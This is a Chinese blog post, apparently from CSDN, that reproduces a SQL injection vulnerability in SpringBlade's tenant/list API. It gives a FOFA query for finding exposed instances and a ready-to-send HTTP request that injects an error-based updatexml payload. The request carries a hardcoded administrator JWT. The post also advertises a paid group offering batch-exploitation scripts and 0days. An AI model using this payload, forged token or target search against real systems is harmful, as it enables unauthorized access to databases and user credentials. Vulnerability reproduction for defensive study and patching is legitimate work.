「漏洞复现」SpringBlade tenant/list SQL 注入漏洞

最新推荐文章于 2024-06-03 12:03:26 发布
最新推荐文章于 2024-06-03 12:03:26 发布
阅读量603 收藏 7
点赞数 9
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39894062/article/details/139383743
版权

0x01 免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!

0x02 产品介绍

SpringBlade 是一个由商业级项目升级优化而来的 SpringCloud 分布式微服务架构、SpringBoot 单体式微服务架构并存的综合型项目。

0x03 漏洞威胁

SpringBlade 后台框架 /api/blade-system/tenant/list 路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x04 漏洞环境

FOFA:

body="https://bladex.vip/"

0x05 漏洞复现

POC

GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
Connection: close

查询数据库版本

0x06 批量脚本验证

Nuclei验证脚本已发布
知识星球:冷漠安全

0x07 修复建议

⼚商已发布了漏洞修复程序,请及时关注更新:

https://github.com/chillzhuang/blade-tool

通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。

如⾮必要,禁⽌公⽹访问该系统。

0x08 加入我们

漏洞详情及批量检测POC工具请前往知识星球获取

知识星球:冷漠安全
交个朋友,限时优惠券:加入立减25
星球福利:每天更新最新漏洞POC、资料文献、内部工具等

「星球介绍」:

本星球不割韭菜,不发烂大街东西。欢迎进来白嫖,不满意三天退款。

本星球坚持每天分享一些攻防知识,包括攻防技术、网络安全漏洞预警脚本、网络安全渗透测试工具、解决方案、安全运营、安全体系、安全培训和安全标准等文库。

本星主已加入几十余个付费星球,定期汇聚高质量资料及工具进行星球分享。

「星球服务」:

加入星球,你会获得:

♦ 批量验证漏洞POC脚本

♦ 0day、1day分享

♦ 汇集其它付费星球资源分享

♦ 大量的红蓝对抗实战资源

♦ 优秀的内部红蓝工具及插件

♦ 综合类别优秀Wiki文库及漏洞库

♦ 提问及技术交流

鲨鱼辣椒丶D
关注
  • 9
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SpringBlade export-user SQL 注入漏洞复现
0xSec
12-19 1709
SpringBlade v3.2.0 及之前版本框架后台 export-user 路径存在安全漏洞,攻击者利用该漏洞可通过组件customSqlSegment 进行SQL注入攻击,攻击者可将用户名、密码等敏感信息通过 excel 导出。
springblade.zip
04-08
SpringBlade是一个基于Spring Boot开发的现代化企业级应用框架,其2.7商业版提供了全套的jar包,旨在简化企业级开发工作,提高开发效率。本文将深入探讨SpringBlade框架的核心特性、主要组件以及如何在项目中进行...
漏洞复现】(1day)Bladex快速开发平台sql注入漏洞
weixin_56297026的博客
12-20 1174
fofa语法:body="https://bladex.vip/"
SpringBlade error/list SQL 注入漏洞复现
0xSec
03-12 1015
SpringBlade 框架后台 /api/blade-log/error/list路径存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
转载:SpringBlade框架JWT认证缺陷漏洞CVE-2021-44910
HRay's blog
01-29 7795
SpringBlade框架JWT认证缺陷漏洞CVE-2021-44910
复现SpringBlade SQL 注入漏洞_22
fushuang333的博客
01-18 2344
复现SpringBlade SQL 注入漏洞SpringBlade 是由一个商业级项目升级优化而来的SpringCloud微服务架构,采用Java8 API重构了业务代码,完全遵循阿里巴巴编码规范。
漏洞复现SpringBlade error_list SQL 注入漏洞
https://blog.echo234.cn/
03-26 596
SpringBlade 是一个由商业级项目升级优化而来的 SpringCloud 分布式微服务架构、SpringBoot 单体式微服务架构并存的综合型项目。框架后台/api/blade-log/error/list路径存在安全漏洞,攻击者利用该漏洞进行SQL注入攻击。
SpringBlade-权限缺陷】API鉴权逻辑缺陷漏洞
06-29 7059
【API鉴权】
SpringBlade:SpringBlade 是一个由商业级项目升级优化而来的SpringCloud分布式微服务架构、SpringBoot单体式微服务架构并存的综合型项目,采用Java8 API重构了业务代码,完全遵循阿里巴巴编码规范。采用Spring Boot 2.4 、Spring Cloud 2020 、Mybatis 等核心技术,同时提供基于React和Vue的两个前端框架用于快速搭建企业级的SaaS多租户微服务平台
05-01
SpringBlade微服务开发平台 采用前后端分离的模式,前端开源两个框架: (基于 React、Ant Design)、 (基于 Vue、Element-UI) 后端采用SpringCloud全家桶,并同时对其基础组件做了高度的封装,单独开源出一个框架: ...
multi-tenant-app-demo:使用Spring Boot和Hibernate 5演示基于鉴别字段(共享模式)的多租户应用程序
01-30
示例应用程序使用Spring Boot和Hibernate演示基于鉴别符字段的多租户。 由于Hibernate(5.x)在支持基于“歧视者”的多租户策略时存在一些问题(请参阅下面的链接)。 下面的解决方法将有助于实现相同的目的。 ...
framework-tenant.zip
05-06
"framework-tenant.zip" 是一个压缩包文件,其核心内容是一个多租户工具类的封装。在IT领域,多租户架构是一种常见的设计模式,尤其在云计算和SaaS(Software as a Service)应用中广泛使用。它允许单一的实例软件为...
HANA 2.0 SP03 Tenant DB
04-23
SAP HANA 2.0 SP03 Tenant DB 最新资料 HANA2.0 常用技术 HANA2.0基础数据库管理(默认就是Tenant DB)
Blade-X日志接口未授权访问
spkiddai
07-30 2564
CNVD-2022-44335 blade-x未授权访问
漏洞复现SpringBlade export-user接口SQL注入漏洞
做自己喜欢的事,并将其发挥到极致!
01-22 1278
SpringBlade 是一个由商业级项目升级优化而来的微服务架构 采用Spring Boot 2.7 、Spring Cloud 2021 等核心技术构建,完全遵循阿里巴巴编码规范。提供基于React和Vue的两个前端框架用于快速搭建企业级的SaaS多租户微服务平台。
SpringBlade dict-biz/list SQL 注入漏洞复现
0xSec
04-16 1393
SpringBlade 后台框架/api/blade-system/dict-biz/list 路径存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现SpringBlade tenant/list SQL 注入漏洞
最新发布
siu~
06-03 666
SpringBlade 后台框架 /api/blade-system/tenantist路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
微服务架构SpringBlade其api接口存在2处SQL注入
qq_39342001的博客
03-19 501
SpringBlade 是一个由商业级项目升级优化而来的微服务架构,采用 Spring Boot 2.7 、Spring Cloud 2021 等核心技术构建,完全遵循阿里巴巴编码规范。任何人在使用本文文中的信息时,应自行承担全部责任,并确保其符合所有相关法律和规定。本文中提及的所有技术和工具,都应在合法和道德的范围内使用。作者不鼓励或支持任何非法或不道德的行为,包括但不限于侵犯版权、侵犯隐私或违反任何其他法律。如果文档中包含任何第三方版权材料,版权归原作者所有,如有侵权,请联系作者进行处理。
sql注入详解
m0_67392811的博客
06-12 5881
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
pigx /api/admin/tenant/list 502
05-24
这个错误通常意味着服务器无法连接到上游服务器或代理。502 Bad Gateway错误通常是中间代理服务器或网关服务器遇到问题时返回的错误。建议检查上游服务器是否可用,或者是否有任何与网络连接相关的问题。您可以尝试重新启动服务器或代理以解决此问题。如果问题仍然存在,请联系您的服务器管理员或网络服务提供商以获取进一步帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值